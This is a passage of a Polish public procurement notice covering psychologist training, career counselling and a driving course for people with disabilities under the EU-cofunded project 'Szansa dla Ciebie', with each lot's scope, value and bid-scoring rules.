zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 60):<br/>PC = ×60 pkt<br/>gdzie: PC – ilość punktów za kryterium „cena”,<br/>Cmin – najniższa cena wynikająca ze złożonych ofert,<br/>Cb – cena badanej oferty.<br/><br/>Ocena w zakresie kryterium „doświadczenie zawodowe psychologa w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym”, będzie dokonywana na podstawie podanej w formularzu ofertowym informacji nt. doświadczenia psychologa wyznaczonego do realizacji zamówienia w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym (min. 2 lata pracy) - liczba punktów możliwych do uzyskania – 40.<br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:<br/>- oferta, w której wskazana przez Wykonawcę liczba lat doświadczenia psychologa wyznaczonego do realizacji zamówienia w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym wynosi:<br/>2 lata - otrzyma 0 pkt<br/>3 lata	- otrzyma 20 pkt<br/>4 lata - otrzyma 30 pkt<br/>5 lat i więcej - otrzyma 40 pkt<br/>gdzie: PD – ilość punktów za kryterium „doświadczenie psychologa w „doświadczenie psychologa w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym” osoby wyznaczonej do realizacji zamówienia<br/><br/>Ocena oferty – dla wszystkich Części zamówienia - suma punktów za poszczególne kryteria:<br/>P= PC+ PD<br/>gdzie: P- ilość punktów<br/>6)	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7)	Zamawiający oceni i porówna tylko te oferty, które odpowiadają treści i wymogom SWZ.<br/>8)	Za najkorzystniejszą dla poszczególnych części zamówienia zostanie uznana oferta, która po zsumowaniu punktów przyznanych w ramach poszczególnych kryteriów, uzyska najwyższą liczbę punktów spośród ofert.<br/>9)	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>10)	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>11)	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 12, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>12)	Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe psychologa w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa przeprowadzenia przez psychologa grupowego treningu kompetencji i umiejętności społecznych w łącznym wymiarze 45 godzin lekcyjnych dla 32 osób z niepełnosprawnościami - Uczestników projektu pn. „Szansa dla Ciebie” współfinansowanego z Europejskiego Funduszu Społecznego w ramach Osi Priorytetowej IX Wspieranie włączenia społecznego i walka z ubóstwem Działania 9.1 Aktywizacja społeczno – zawodowa osób wykluczonych i przeciwdziałanie wykluczeniu społecznemu Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2014-2020, w tym:<br/>a.	dla 8 Uczestników projektu pn. „Szansa dla Ciebie” – mieszkańców Domu Pomocy Społecznej w Jedlance - 12 godzin lekcyjnych;<br/>b.	dla 8 Uczestniczek projektu pn. „Szansa dla Ciebie” – mieszkanek Domu Pomocy Społecznej w Krzyżanowicach - 12 godzin lekcyjnych;<br/>c.	dla 8 Uczestników projektu pn. „Szansa dla Ciebie” – mieszkańców Domu Pomocy Społecznej w Wierzbicy - 12 godzin lekcyjnych;<br/>d.	dla 8 Uczestników projektu pn. „Szansa dla Ciebie” – mieszkańców powiatu radomskiego (osób ze środowiska) - 9 godzin lekcyjnych.<br/>2.	Usługa będzie obejmowała:<br/>a.	przeprowadzenie przez psychologa treningu kompetencji i umiejętności społecznych dla 4 grup Uczestników projektu (osób z niepełnosprawnościami) mającego na celu podniesienie kompetencji społecznych umożliwiających prawidłowe funkcjonowanie w życiu społecznym w oparciu o opracowany przez Wykonawcę materiał szkoleniowy obejmujący m.in. następujące zagadnienia: budowanie własnego wizerunku, pozytywnej samooceny, asertywność, poznanie własnych emocji i reakcji, radzenie sobie ze stresem i agresją, rozwiązywanie konfliktów, skuteczna komunikacja.<br/>Wykonawca może poszerzyć minimalny zakres tematyczny podany przez Zamawiającego o zagadnienia związane z zakresem treningu, które w ocenie Wykonawcy powinny być zrealizowane celem odpowiedniego przygotowania uczestników treningu;<br/>b.	przygotowanie materiałów szkoleniowych dla Uczestników projektu, które są potrzebne do właściwego zrealizowania usługi;<br/>c.	prowadzenie niezbędnej dokumentacji dotyczącej realizowanej usługi, w szczególności: dzienników zajęć (odrębny dziennik dla każdej grupy Uczestników projektu), list obecności Uczestników;<br/>d.	sporządzenie sprawozdania z realizacji zajęć (z podziałem na poszczególne grupy Uczestników) zawierającego co najmniej: okres realizacji zajęć, zakres tematyczny, krótką ocenę aktywności i zaangażowania uczestników podczas zajęć, spostrzeżenia osoby prowadzącej nt. zmian w postawach uczestników na koniec realizacji treningu kompetencji i umiejętności społecznych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3600 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokonuje wyboru najkorzystniejszej oferty dla każdej części zamówienia na podstawie kryteriów oceny ofert określonych w SWZ.<br/><br/>Ocena oferty będzie dokonywana wg poniższych zasad:<br/>Ocena w zakresie kryterium „cena” – dla wszystkich Części zamówienia będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 60):<br/>PC = ×60 pkt<br/>gdzie: PC – ilość punktów za kryterium „cena”,<br/>Cmin – najniższa cena wynikająca ze złożonych ofert,<br/>Cb – cena badanej oferty.<br/><br/>Ocena w zakresie kryterium „doświadczenie zawodowe psychologa w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym”, będzie dokonywana na podstawie podanej w formularzu ofertowym informacji nt. doświadczenia psychologa wyznaczonego do realizacji zamówienia w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym (min. 2 lata pracy) - liczba punktów możliwych do uzyskania – 40.<br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:<br/>- oferta, w której wskazana przez Wykonawcę liczba lat doświadczenia psychologa wyznaczonego do realizacji zamówienia w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym wynosi:<br/>2 lata - otrzyma 0 pkt<br/>3 lata	- otrzyma 20 pkt<br/>4 lata - otrzyma 30 pkt<br/>5 lat i więcej - otrzyma 40 pkt<br/>gdzie: PD – ilość punktów za kryterium „doświadczenie psychologa w „doświadczenie psychologa w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym” osoby wyznaczonej do realizacji zamówienia<br/><br/>Ocena oferty – dla wszystkich Części zamówienia - suma punktów za poszczególne kryteria:<br/>P= PC+ PD<br/>gdzie: P- ilość punktów<br/>6)	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7)	Zamawiający oceni i porówna tylko te oferty, które odpowiadają treści i wymogom SWZ.<br/>8)	Za najkorzystniejszą dla poszczególnych części zamówienia zostanie uznana oferta, która po zsumowaniu punktów przyznanych w ramach poszczególnych kryteriów, uzyska najwyższą liczbę punktów spośród ofert.<br/>9)	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>10)	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>11)	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 12, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>12)	Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe psychologa w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa przeprowadzenia zajęć indywidualnych z doradcą zawodowym dla 8 Uczestników projektu pn. „Szansa dla Ciebie” (osób z niepełnosprawnościami) współfinansowanego z Europejskiego Funduszu Społecznego w ramach Osi Priorytetowej IX Wspieranie włączenia społecznego i walka z ubóstwem Działania 9.1 Aktywizacja społeczno – zawodowa osób wykluczonych i przeciwdziałanie wykluczeniu społecznemu Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2014-2020.<br/>Usługa będzie obejmowała:<br/>a.	przeprowadzenie przez doradcę zawodowego zajęć indywidualnych mających na celu aktywizację zawodową i pomoc w podjęciu decyzji dotyczącej wyboru szkolenia zawodowego dla 8 Uczestników Projektu (osób z niepełnosprawnościami) w łącznym wymiarze 16 godzin zegarowych (2 godz. zegarowe na osobę);<br/>b.	przygotowanie materiałów szkoleniowych/narzędzi do pracy dla Uczestników projektu, które są potrzebne do właściwego zrealizowania usługi;<br/>c.	prowadzenie niezbędnej dokumentacji dotyczącej realizowanej usługi, w szczególności: kart zajęć indywidualnych z Uczestnikami projektu;<br/>d.	sporządzenie sprawozdania z realizacji zajęć (z podziałem na poszczególne grupy Uczestników) zawierającego co najmniej: okres realizacji zajęć, krótką ocenę aktywności i zaangażowania uczestników podczas zajęć, wnioski osoby prowadzącej nt. Propozycji wyboru szkolenia zawodowego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1600 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312320-8 - Usługi doradztwa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokonuje wyboru najkorzystniejszej oferty dla każdej części zamówienia na podstawie kryteriów oceny ofert określonych w SWZ.<br/><br/>Ocena oferty będzie dokonywana wg poniższych zasad:<br/>Ocena w zakresie kryterium „cena” – dla wszystkich Części zamówienia będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 60):<br/>PC = ×60 pkt<br/>gdzie: PC – ilość punktów za kryterium „cena”,<br/>Cmin – najniższa cena wynikająca ze złożonych ofert,<br/>Cb – cena badanej oferty.<br/><br/>Ocena w zakresie kryterium „doświadczenie zawodowe doradcy zawodowego w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym”, będzie dokonywana na podstawie podanej w formularzu ofertowym informacji nt. doświadczenia doradcy zawodowego wyznaczonego do realizacji zamówienia w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym (min. 2 lata pracy) - liczba punktów możliwych do uzyskania – 40.<br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:<br/>- oferta, w której wskazana przez Wykonawcę liczba lat doświadczenia doradcy zawodowego wyznaczonego do realizacji zamówienia w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym wynosi:<br/>2 lata - otrzyma 0 pkt<br/>3 lata	- otrzyma 20 pkt<br/>4 lata - otrzyma 30 pkt<br/>5 lat i więcej - otrzyma 40 pkt<br/>gdzie: PD – ilość punktów za kryterium „doświadczenie psychologa w „doświadczenie doradcy zawodowego w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym” osoby wyznaczonej do realizacji zamówienia<br/>Ocena oferty – dla wszystkich Części zamówienia - suma punktów za poszczególne kryteria:<br/>P= PC+ PD<br/>gdzie: P- ilość punktów<br/>6)	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7)	Zamawiający oceni i porówna tylko te oferty, które odpowiadają treści i wymogom SWZ.<br/>8)	Za najkorzystniejszą dla poszczególnych części zamówienia zostanie uznana oferta, która po zsumowaniu punktów przyznanych w ramach poszczególnych kryteriów, uzyska najwyższą liczbę punktów spośród ofert.<br/>9)	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>10)	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>11)	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 12, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>12)	Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe doradcy zawodowego w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia kursu nauki jazdy kat. B dla 5 Uczestników projektu pn. „Szansa dla Ciebie” współfinansowanego z Europejskiego Funduszu Społecznego w ramach Osi Priorytetowej IX Wspieranie włączenia społecznego i walka z ubóstwem Działania 9.1 Aktywizacja społeczno – zawodowa osób wykluczonych i przeciwdziałanie wykluczeniu społecznemu Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2014-2020, zgodnie z obowiązującymi przepisami prawa, umożliwiającego przystąpienie do egzaminu państwowego, na którą składa się:<br/>a.	organizacja i przeprowadzenie kursu nauki jazdy kategorii B w wymiarze nie mniejszym niż 60 godzin, w tym: <br/>	liczba godzin zajęć w zakresie części teoretycznej szkolenia nie może być mniejsza niż 30 godzin (jedna godzina dydaktyczna to 45 minut);<br/>	liczba godzin zajęć w zakresie części praktycznej szkolenia nie może być mniejsza niż 30 godzin (jedna godzina praktycznej nauki jazdy to 60 minut);<br/>b.	zorganizowanie badania lekarskiego w celu stwierdzenia braku przeciwskazań do ubiegania się o uprawnienia do prowadzenia pojazdów kategorii B i pokrycie kosztów tego badania oraz uzyskania zaświadczenia lekarskiego;<br/>c.	zapewnienie bezpłatnie każdemu Uczestnikowi kursu materiałów dydaktycznych (min. bezzwrotny egzemplarz podręcznika dla kandydata na prawo jazdy kat. B wraz z płytą DVD lub CD zawierającą odpowiednie zestawy pytań testowych wykorzystywanych aktualnie podczas egzaminów oraz inne materiały dydaktyczne potrzebne do przeprowadzenia kursu);<br/>d.	zorganizowanie zajęć teoretycznych w granicach administracyjnych miasta Radom;<br/>e.	przeprowadzenie zajęć w ramach kursu w oparciu o harmonogram ustalony z Zamawiającym; <br/>f.	zapewnienie wszystkim Uczestnikom warunków lokalowych, niezbędnego sprzętu, placu manewrowego, samochodów (tożsamych w zakresie marki i modelu z samochodami obowiązującymi na egzaminach państwowych na prawo jazdy kat. B w Wojewódzkim Ośrodku Ruchu Drogowego w Radomiu w ilości i stanie technicznym zapewniającym sprawne i terminowe zrealizowanie zamówienia) do przeprowadzenia zajęć teoretycznych i praktycznych w ramach kursu;<br/>Zajęcia muszą odbywać się w pomieszczeniu/-niach dostosowanym/-ych do prowadzenia zajęć i odpowiednio w tym celu wyposażonych w niezbędny do przeprowadzenia zajęć teoretycznych sprzęt, umożliwiający prezentowanie zdjęć, filmów instruktażowych itp. <br/>g.	zapewnienie wykwalifikowanej i doświadczonej kadry spełniającej wymogi określone przepisami prawa; <br/>h.	objęcie ubezpieczeniem NNW Uczestników projektu na czas realizacji kursu oraz w drodze do miejsca szkolenia i z powrotem;<br/>i.	zorganizowanie i przeprowadzenie egzaminu wewnętrznego oraz wydanie stosownego dokumentu, zgodnego z obowiązującymi przepisami, uprawniającego do przystąpienia do egzaminu państwowego;<br/>j.	zorganizowanie przystąpienia przez Uczestników projektu/kursu do egzaminu państwowego i uiszczenie opłaty jednego egzaminu państwowego teoretycznego (w przypadku nie uzyskania przez uczestnika pozytywnego wyniku egzaminu, kolejne egzaminy opłacane są ze środków własnych Uczestnika projektu) oraz jednego egzaminu państwowego praktycznego (w przypadku nie uzyskania przez uczestnika pozytywnego wyniku egzaminu, kolejne egzaminy opłacane są ze środków własnych Uczestnika projektu). Zamawiający wymaga, aby egzamin odbył się w Wojewódzkim Ośrodku Ruchu Drogowego w Radomiu. <br/>k.	przeprowadzenie zajęć w ramach kursu oraz egzaminu wewnętrznego przy zachowaniu aktualnych w okresie trwania kursu obostrzeń wynikających z obowiązującego stanu zagrożenia epidemicznego;<br/>l.	zapewnienie Uczestnikom środków ochrony osobistej w postaci maseczek i środka do dezynfekcji rąk, jeżeli przepisy prawa w okresie realizacji usługi będą tego wymagały;<br/>m.	zapewnienie usługi cateringowej podczas zajęć teoretycznych:<br/>•	w przypadku gdy zajęcia będą trwały nie krócej niż 4 godziny lekcyjne dziennie, obejmującej co najmniej: kawę 250 ml/os., herbatę 250 ml/os., wodę 300 ml/os., mleko, cukier, drobne słone lub słodkie przekąski typu paluszki lub kruche ciastka 150 g/os.<br/>•	w przypadku, gdy zajęcia będą trwały powyżej 6 godzin lekcyjnych dla tych samych osób Wykonawca zapewni poza w/w napojami i przekąskami również posiłek obiadowy składający się z: zupy 250 ml/os., dania głównego 500 g/os. (w tym: 1 sztuka mięsa/ryby 150 g/os., dodatki np. ziemniaki, frytki 250g/os., zestaw surówek 100 g/os.), kompotu lub soku 250 ml/os.). <br/>n.	przygotowanie i prowadzenie dokumentacji związanej z realizacją zamówienia, w tym przede wszystkim: harmonogram zajęć wraz z zakresem tematycznym i nazwiskami osób prowadzących, dziennik zajęć edukacyjnych, listy obecności na zajęciach (teoretycznych, praktycznych, egzaminie wewnętrznym), potwierdzenia odbioru materiałów dydaktycznych, rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia, potwierdzenie odbioru usługi cateringowej, utrwalenie fotograficzne przebiegu realizacji usługi (min. 20 zdjęć, na których będą widoczni Uczestnicy projektu „Szansa dla Ciebie”) i przekazanie Zamawiającemu na płycie CD/DVD lub innym nośniku wykonanych zdjęć.<br/>Wykonawca będzie zobowiązany do przekazania Zamawiającemu oryginałów poszczególnych dokumentów związanych z realizacją zamówienia, a w przypadku dokumentów, które w oryginale Uczestnik kursu będzie musiał przedłożyć do Urzędu lub Wojewódzkiego Ośrodka Ruchu Drogowego, Zamawiającemu przekazane zostaną kopie potwierdzone za zgodność z oryginałem przez Wykonawcę. Wykonawca przekaże Zamawiającemu również potwierdzenie uiszczenia opłaty za egzamin państwowy (teoretyczny i praktyczny) Uczestników Projektu.<br/>o.	prowadzenie działań informacyjnych i promocyjnych poprzez m.in. umieszczenie obowiązujących logotypów na wszystkich dokumentach związanych z realizacją projektu, oznakowanie miejsca realizacji zajęć w ramach kursu plakatami dotyczącymi realizacji projektu przekazanymi przez Zamawiającego oraz informowanie uczestników kursu o tym, że jest on realizowany w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2014-2020;<br/>Wszelkie działania promocyjne muszą być zgodne z wytycznymi w tym zakresie przekazanymi przez Zamawiającego. <br/>p.	przeprowadzenia kursu z zapewnieniem dostępności osobom ze szczególnymi potrzebami, określonych w art. 6 ust. 1 (dostępność architektoniczna) oraz w art. 6 ust. 2 i 3 (dostępność cyfrowa oraz informacyjno-komunikacyjna) ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (t.j. Dz. U. z 2020 r. poz. 1062 z późn. zm.). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 12500 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80411200-0 - Usługi szkół nauki jazdy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokonuje wyboru najkorzystniejszej oferty dla każdej części zamówienia na podstawie kryteriów oceny ofert określonych w SWZ.<br/><br/>Ocena oferty będzie dokonywana wg poniższych zasad:<br/>Ocena w zakresie kryterium „cena” – dla wszystkich Części zamówienia będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 60):<br/>PC = ×60 pkt<br/>gdzie: PC – ilość punktów za kryterium „cena”,<br/>Cmin – najniższa cena wynikająca ze złożonych ofert,<br/>Cb – cena badanej oferty.<br/><br/>Ocena w zakresie kryterium „doświadczenie w przeprowadzaniu kursu nauki jazdy kat. B”, będzie dokonywana na podstawie podanej w formularzu ofertowym informacji nt. doświadczenia Wykonawcy w przeprowadzaniu kursu nauki jazdy kat. B (min. 2 lata) - liczba punktów możliwych do uzyskania – 40. <br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:<br/>- oferta, w której wskazana przez Wykonawcę liczba lat doświadczenia w przeprowadzaniu kursu nauki jazdy kat. B wynosi:<br/>2 lata - otrzyma 0 pkt<br/>3 lata	- otrzyma 20 pkt<br/>4 lata - otrzyma 30 pkt<br/>5 lat i więcej - otrzyma 40 pkt<br/>gdzie: PD – ilość punktów za kryterium „doświadczenie w przeprowadzaniu kursu nauki jazdy kat. B” Wykonawcy<br/><br/>Ocena oferty – dla wszystkich Części zamówienia - suma punktów za poszczególne kryteria:<br/>P= PC+ PD<br/>gdzie: P- ilość punktów<br/>6)	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7)	Zamawiający oceni i porówna tylko te oferty, które odpowiadają treści i wymogom SWZ.<br/>8)	Za najkorzystniejszą dla poszczególnych części zamówienia zostanie uznana oferta, która po zsumowaniu punktów przyznanych w ramach poszczególnych kryteriów, uzyska najwyższą liczbę punktów spośród ofert.<br/>9)	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>10)	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>11)	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 12, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>12)	Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie w przeprowadzaniu kursu nauki jazdy kat. B</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/>1)	Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunków w ww. zakresie.<br/>2)	